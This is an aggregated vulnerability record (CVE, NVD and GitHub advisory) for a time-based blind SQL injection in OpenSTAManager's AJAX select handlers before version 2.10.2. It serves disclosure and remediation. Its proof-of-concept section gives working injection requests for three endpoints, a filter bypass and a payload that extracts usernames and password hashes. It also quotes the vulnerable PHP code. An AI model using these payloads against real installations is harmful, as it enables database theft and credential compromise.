CVE-2026-28805 (GCVE-0-2026-28805)
Vulnerability from cvelistv5 – Published: 2026-04-02 13:44 – Updated: 2026-04-02 18:31
VLAI?
Title
OpenSTAManager: Time-Based Blind SQL Injection via `options[stato]` Parameter
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2.
Severity ?
8.8 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| devcode-it | openstamanager |
Affected:
< 2.10.2
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-28805",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T18:30:58.710195Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T18:31:08.958Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "openstamanager",
"vendor": "devcode-it",
"versions": [
{
"status": "affected",
"version": "\u003c 2.10.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect[\u0027stato\u0027] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T13:44:07.063Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc"
},
{
"name": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7"
},
{
"name": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc"
},
{
"name": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
}
],
"source": {
"advisory": "GHSA-3gw8-3mg3-jmpc",
"discovery": "UNKNOWN"
},
"title": "OpenSTAManager: Time-Based Blind SQL Injection via `options[stato]` Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-28805",
"datePublished": "2026-04-02T13:44:07.063Z",
"dateReserved": "2026-03-03T14:25:19.246Z",
"dateUpdated": "2026-04-02T18:31:08.958Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-28805",
"date": "2026-04-16",
"epss": "0.00035",
"percentile": "0.10122"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-28805\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T14:16:26.400\",\"lastModified\":\"2026-04-07T21:17:55.163\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect[\u0027stato\u0027] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.10.2\",\"matchCriteriaId\":\"37690084-64E6-4E8B-8A92-8B55C8FC1E9F\"}]}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"OpenSTAManager: Time-Based Blind SQL Injection via `options[stato]` Parameter\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-89\", \"lang\": \"en\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 8.8, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc\"}, {\"name\": \"https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7\"}, {\"name\": \"https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc\"}, {\"name\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\"}], \"affected\": [{\"vendor\": \"devcode-it\", \"product\": \"openstamanager\", \"versions\": [{\"version\": \"\u003c 2.10.2\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-02T13:44:07.063Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect[\u0027stato\u0027] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2.\"}], \"source\": {\"advisory\": \"GHSA-3gw8-3mg3-jmpc\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-28805\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-02T18:30:58.710195Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-02T18:31:04.161Z\"}}]}",
"cveMetadata": "{\"cveId\": \"CVE-2026-28805\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-03-03T14:25:19.246Z\", \"datePublished\": \"2026-04-02T13:44:07.063Z\", \"dateUpdated\": \"2026-04-02T18:31:08.958Z\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-28805
Vulnerability from fkie_nvd - Published: 2026-04-02 14:16 - Updated: 2026-04-07 21:17
Severity ?
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| devcode | openstamanager | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F",
"versionEndExcluding": "2.10.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect[\u0027stato\u0027] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2."
}
],
"id": "CVE-2026-28805",
"lastModified": "2026-04-07T21:17:55.163",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-02T14:16:26.400",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-3GW8-3MG3-JMPC
Vulnerability from github – Published: 2026-04-01 19:46 – Updated: 2026-04-06 17:17
VLAI?
Summary
OpenSTAManager has a Time-Based Blind SQL Injection via `options[stato]` Parameter
Details
Description
Multiple AJAX select handlers in OpenSTAManager <= 2.10.1 are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation.
An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database.
Affected Endpoints
Three modules share the same vulnerability pattern:
1. Preventivi (Quotes) - Primary
- Endpoint:
GET /ajax_select.php?op=preventivi - File:
modules/preventivi/ajax/select.php, line 60 - Required parameters:
options[idanagrafica](any valid ID)
Vulnerable code:
// modules/preventivi/ajax/select.php, lines 59-60
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
$where[] = '('.$stato.' = 1)';
The $stato variable is inserted as a bare expression inside parentheses. The resulting SQL fragment becomes ({user_input} = 1), allowing an attacker to break out of the expression and inject arbitrary SQL.
2. Ordini (Orders)
- Endpoint:
GET /ajax_select.php?op=ordini-cliente - File:
modules/ordini/ajax/select.php, line 52 - Required parameters:
options[idanagrafica](any valid ID)
Vulnerable code:
// modules/ordini/ajax/select.php, lines 51-52
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_fatturabile';
$where[] = '`or_statiordine`.'.$stato.' = 1';
The $stato variable is inserted as a column name reference. The resulting SQL fragment becomes `or_statiordine`.{user_input} = 1, allowing injection after the table-column reference.
3. Contratti (Contracts)
- Endpoint:
GET /ajax_select.php?op=contratti - File:
modules/contratti/ajax/select.php, line 57 - Required parameters:
options[idanagrafica](any valid ID)
Vulnerable code:
// modules/contratti/ajax/select.php, lines 56-57
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';
The $stato variable is inserted inside a subquery. The resulting SQL fragment becomes WHERE {user_input} = 1), allowing an attacker to close the subquery and inject into the outer query.
Root Cause Analysis
Data Flow
- The attacker sends a GET request with
options[stato]=<payload>to/ajax_select.php ajax_select.php(line 30) reads the value viafilter('options'), which applies HTMLPurifier sanitization- HTMLPurifier strips HTML tags and the
>character, but does NOT strip SQL keywords (SELECT,SLEEP,IF,UNION, etc.) or SQL-significant characters ((,),=,', etc.) - The sanitized value is passed to
AJAX::select()insrc/AJAX.php(line 40) AJAX::getSelectResults()assigns$superselect = $options(line 273) andrequires the module'sselect.phpfile (line 275)- The module's
select.phpreads$superselect['stato']and concatenates it directly into the$where[]array AJAX::selectResults()joins all WHERE elements withANDand executes the query viaQuery::executeAndCount()(line 120)
Why HTMLPurifier is Insufficient
HTMLPurifier is an HTML sanitization library designed to prevent XSS attacks. It is not an SQL injection prevention mechanism. Specifically:
- It does not strip SQL keywords:
SELECT,SLEEP,IF,UNION,FROM,WHERE - It does not strip SQL operators:
=,(,),,,+,-,* - It strips the
>character (used in HTML), which can be bypassed using MySQL'sGREATEST()function - It provides zero protection against SQL injection
Proof of Concept
Prerequisites
- A valid user account on the OpenSTAManager instance (any privilege level)
- Network access to the application
Step 1: Authenticate
POST /index.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
op=login&username=<user>&password=<pass>
Save the PHPSESSID cookie from the Set-Cookie response header.
Step 2: Verify Injection (SLEEP test)
Baseline request (normal response time ~200ms):
GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=is_pianificabile HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session>
Injection request (response time ~10 seconds):
GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1 HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session>
Expected result: The response is delayed by approximately 10 seconds, confirming that the SLEEP(10) function was executed by the database server. The response body in both cases is identical: {"results":[],"recordsFiltered":0}.
Step 3: Data Extraction (demonstrating impact)
Using binary search with time-based boolean conditions, an attacker can extract arbitrary data. The > character is stripped by HTMLPurifier, so the GREATEST() function is used as an equivalent:
Extract username length:
GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1 HTTP/1.1
This technique was used to successfully extract:
- Username:
admin(5 characters, extracted character by character) - Password hash prefix:
$2y$10$qAo04wNbhR9cpxjHzrtcnu...(bcrypt) - MySQL version:
8.3.0
PoC for Other Endpoints
Ordini (orders):
GET /ajax_select.php?op=ordini-cliente&options[idanagrafica]=1&options[stato]=is_fatturabile+%3D+1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+1 HTTP/1.1
Contratti (contracts):
GET /ajax_select.php?op=contratti&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+(1 HTTP/1.1
Both endpoints show the same SLEEP-based timing delay, confirming the injection.
Impact
- Confidentiality: An attacker can extract the entire database contents, including user credentials (usernames and bcrypt password hashes), personal identifiable information (PII), financial records (invoices, quotes, contracts, payments), and application configuration.
- Integrity: With MySQL's
INSERT/UPDATEcapabilities via subqueries, an attacker may be able to modify data. - Availability: An attacker can execute
SLEEP()with large values or resource-intensive queries to cause denial of service.
Proposed Remediation
Option A: Allowlist Validation (Recommended)
Replace the direct concatenation with an allowlist of permitted column names:
// modules/preventivi/ajax/select.php — FIXED
$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile', 'is_concluso'];
$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)
? $superselect['stato']
: 'is_pianificabile';
$where[] = '('.$stato.' = 1)';
// modules/ordini/ajax/select.php — FIXED
$allowed_stati = ['is_fatturabile', 'is_evadibile', 'is_completato'];
$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)
? $superselect['stato']
: 'is_fatturabile';
$where[] = '`or_statiordine`.'.$stato.' = 1';
// modules/contratti/ajax/select.php — FIXED
$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile'];
$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)
? $superselect['stato']
: 'is_pianificabile';
$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';
This approach is recommended because the stato parameter represents a database column name (not a value), so prepared statements cannot be used here. The allowlist ensures only known-safe column names are accepted.
Option B: Regex Validation (Alternative)
If the set of column names is dynamic, validate the format strictly:
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
if (!preg_match('/^[a-z_]+$/i', $stato)) {
$stato = 'is_pianificabile'; // fallback to safe default
}
$where[] = '('.$stato.' = 1)';
This ensures only alphabetic characters and underscores are accepted, preventing any SQL injection.
Option C: Backtick Quoting (Supplementary)
In addition to validation, wrap the column name in backticks to treat it as an identifier:
$where[] = '(`'.str_replace('`', '', $stato).'` = 1)';
Note: This alone is insufficient without input validation but provides defense-in-depth.
Global Recommendation
Audit all usages of $superselect across the codebase. Any value from $superselect that is used as part of a SQL expression (not as a parameterized value) must be validated against an allowlist. The prepare() function is already used correctly in other parts of the code — the issue is specifically where $superselect values are used as column names or bare expressions.
Credits
Omar Ramirez
Severity ?
8.8 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.10.1"
},
"package": {
"ecosystem": "Packagist",
"name": "devcode-it/openstamanager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28805"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T19:46:00Z",
"nvd_published_at": "2026-04-02T14:16:26Z",
"severity": "HIGH"
},
"details": "## Description\n\nMultiple AJAX select handlers in OpenSTAManager \u003c= 2.10.1 are vulnerable to Time-Based Blind SQL Injection through the `options[stato]` GET parameter. The user-supplied value is read from `$superselect[\u0027stato\u0027]` and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database.\n\n## Affected Endpoints\n\nThree modules share the same vulnerability pattern:\n\n### 1. Preventivi (Quotes) - Primary\n\n- **Endpoint:** `GET /ajax_select.php?op=preventivi`\n- **File:** `modules/preventivi/ajax/select.php`, line 60\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/preventivi/ajax/select.php, lines 59-60\n$stato = !empty($superselect[\u0027stato\u0027]) ? $superselect[\u0027stato\u0027] : \u0027is_pianificabile\u0027;\n$where[] = \u0027(\u0027.$stato.\u0027 = 1)\u0027;\n```\n\nThe `$stato` variable is inserted as a bare expression inside parentheses. The resulting SQL fragment becomes `({user_input} = 1)`, allowing an attacker to break out of the expression and inject arbitrary SQL.\n\n### 2. Ordini (Orders)\n\n- **Endpoint:** `GET /ajax_select.php?op=ordini-cliente`\n- **File:** `modules/ordini/ajax/select.php`, line 52\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/ordini/ajax/select.php, lines 51-52\n$stato = !empty($superselect[\u0027stato\u0027]) ? $superselect[\u0027stato\u0027] : \u0027is_fatturabile\u0027;\n$where[] = \u0027`or_statiordine`.\u0027.$stato.\u0027 = 1\u0027;\n```\n\nThe `$stato` variable is inserted as a column name reference. The resulting SQL fragment becomes `` `or_statiordine`.{user_input} = 1 ``, allowing injection after the table-column reference.\n\n### 3. Contratti (Contracts)\n\n- **Endpoint:** `GET /ajax_select.php?op=contratti`\n- **File:** `modules/contratti/ajax/select.php`, line 57\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/contratti/ajax/select.php, lines 56-57\n$stato = !empty($superselect[\u0027stato\u0027]) ? $superselect[\u0027stato\u0027] : \u0027is_pianificabile\u0027;\n$where[] = \u0027`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE \u0027.$stato.\u0027 = 1)\u0027;\n```\n\nThe `$stato` variable is inserted inside a subquery. The resulting SQL fragment becomes `WHERE {user_input} = 1)`, allowing an attacker to close the subquery and inject into the outer query.\n\n## Root Cause Analysis\n\n### Data Flow\n\n1. The attacker sends a GET request with `options[stato]=\u003cpayload\u003e` to `/ajax_select.php`\n2. `ajax_select.php` (line 30) reads the value via `filter(\u0027options\u0027)`, which applies HTMLPurifier sanitization\n3. HTMLPurifier strips HTML tags and the `\u003e` character, but does **NOT** strip SQL keywords (`SELECT`, `SLEEP`, `IF`, `UNION`, etc.) or SQL-significant characters (`(`, `)`, `=`, `\u0027`, etc.)\n4. The sanitized value is passed to `AJAX::select()` in `src/AJAX.php` (line 40)\n5. `AJAX::getSelectResults()` assigns `$superselect = $options` (line 273) and `require`s the module\u0027s `select.php` file (line 275)\n6. The module\u0027s `select.php` reads `$superselect[\u0027stato\u0027]` and concatenates it directly into the `$where[]` array\n7. `AJAX::selectResults()` joins all WHERE elements with `AND` and executes the query via `Query::executeAndCount()` (line 120)\n\n### Why HTMLPurifier is Insufficient\n\nHTMLPurifier is an HTML sanitization library designed to prevent XSS attacks. It is **not** an SQL injection prevention mechanism. Specifically:\n\n- It does **not** strip SQL keywords: `SELECT`, `SLEEP`, `IF`, `UNION`, `FROM`, `WHERE`\n- It does **not** strip SQL operators: `=`, `(`, `)`, `,`, `+`, `-`, `*`\n- It strips the `\u003e` character (used in HTML), which can be bypassed using MySQL\u0027s `GREATEST()` function\n- It provides zero protection against SQL injection\n\n## Proof of Concept\n\n### Prerequisites\n\n- A valid user account on the OpenSTAManager instance (any privilege level)\n- Network access to the application\n\n### Step 1: Authenticate\n\n```\nPOST /index.php HTTP/1.1\nHost: \u003ctarget\u003e\nContent-Type: application/x-www-form-urlencoded\n\nop=login\u0026username=\u003cuser\u003e\u0026password=\u003cpass\u003e\n```\n\nSave the `PHPSESSID` cookie from the `Set-Cookie` response header.\n\n### Step 2: Verify Injection (SLEEP test)\n\n**Baseline request** (normal response time ~200ms):\n\n```\nGET /ajax_select.php?op=preventivi\u0026options[idanagrafica]=1\u0026options[stato]=is_pianificabile HTTP/1.1\nHost: \u003ctarget\u003e\nCookie: PHPSESSID=\u003csession\u003e\n```\n\n**Injection request** (response time ~10 seconds):\n\n```\nGET /ajax_select.php?op=preventivi\u0026options[idanagrafica]=1\u0026options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1 HTTP/1.1\nHost: \u003ctarget\u003e\nCookie: PHPSESSID=\u003csession\u003e\n```\n\n**Expected result:** The response is delayed by approximately 10 seconds, confirming that the `SLEEP(10)` function was executed by the database server. The response body in both cases is identical: `{\"results\":[],\"recordsFiltered\":0}`.\n\n\u003cimg width=\"934\" height=\"491\" alt=\"image\" src=\"https://github.com/user-attachments/assets/27beff84-3e25-43e1-b484-76db25c0faa8\" /\u003e\n\n\n### Step 3: Data Extraction (demonstrating impact)\n\nUsing binary search with time-based boolean conditions, an attacker can extract arbitrary data. The `\u003e` character is stripped by HTMLPurifier, so the `GREATEST()` function is used as an equivalent:\n\n**Extract username length:**\n\n```\nGET /ajax_select.php?op=preventivi\u0026options[idanagrafica]=1\u0026options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1 HTTP/1.1\n```\n\nThis technique was used to successfully extract:\n\n- **Username:** `admin` (5 characters, extracted character by character)\n- **Password hash prefix:** `$2y$10$qAo04wNbhR9cpxjHzrtcnu...` (bcrypt)\n- **MySQL version:** `8.3.0`\n\n### PoC for Other Endpoints\n\n**Ordini (orders):**\n\n```\nGET /ajax_select.php?op=ordini-cliente\u0026options[idanagrafica]=1\u0026options[stato]=is_fatturabile+%3D+1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+1 HTTP/1.1\n```\n\n**Contratti (contracts):**\n\n```\nGET /ajax_select.php?op=contratti\u0026options[idanagrafica]=1\u0026options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+(1 HTTP/1.1\n```\n\nBoth endpoints show the same SLEEP-based timing delay, confirming the injection.\n\n## Impact\n\n- **Confidentiality:** An attacker can extract the entire database contents, including user credentials (usernames and bcrypt password hashes), personal identifiable information 